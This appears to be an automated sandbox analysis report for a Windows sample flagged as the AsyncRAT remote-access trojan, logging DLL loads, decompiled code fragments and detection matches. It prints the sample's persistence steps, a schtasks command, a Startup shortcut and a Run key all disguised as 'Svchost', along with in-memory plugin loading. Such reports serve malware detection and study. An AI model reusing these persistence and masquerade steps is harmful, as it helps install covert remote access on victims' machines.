                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: X.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: X.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.X.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: X.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: X.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: X.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Svchost.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Svchost.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: X.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: X.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: Svchost.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: Svchost.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@18/10@5/2
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeMutant created: NULL
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7096
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                  Source: C:\Users\user\Desktop\X.exeMutant created: \Sessions\1\BaseNamedObjects\o8IEVsVtNAApv1Ch
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                  Source: X.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: X.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\X.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\X.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: X.exeReversingLabs: Detection: 81%
                  Source: X.exeVirustotal: Detection: 79%
                  Source: C:\Users\user\Desktop\X.exeFile read: C:\Users\user\Desktop\X.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\X.exe C:\Users\user\Desktop\X.exe
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe "C:\Users\user\AppData\Local\Temp\Svchost.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe "C:\Users\user\AppData\Local\Temp\Svchost.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Svchost.exe C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exeJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972Jump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\Desktop\X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                  Source: Svchost.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\Svchost.exe
                  Source: C:\Users\user\Desktop\X.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: X.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbc9 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: .pdb6 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdbp source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.pdbp source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Configuration.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: csymbols\dll\mscorlib.pdbpdb` source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.pdb( source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: 0C:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Core.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.pdbSystem.Management.dllSystem.Xml.ni.dll source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.pdb@ source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp, X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp, WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: X.exe, 00000000.00000002.4057742759.000000001B10D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbp source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: System.Management.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4058978996.000000001BCE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb,_ source: X.exe, 00000000.00000002.4057742759.000000001B14D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: indoC:\Windows\mscorlib.pdb source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER93E1.tmp.dmp.17.dr
                  Source: Binary string: p\X.PDB0 source: X.exe, 00000000.00000002.4058978996.000000001BD18000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\X.PDBL7 source: X.exe, 00000000.00000002.4059201374.000000001BFD8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER93E1.tmp.dmp.17.dr

                  Data Obfuscation

                  barindex
                  Source: X.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: X.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: X.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: X.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: X.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: X.exe, Messages.cs.Net Code: Memory
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: Svchost.exe.0.dr, Messages.cs.Net Code: Memory

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Local\Temp\Svchost.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                  Source: C:\Users\user\Desktop\X.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Svchost.lnkJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SvchostJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\X.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
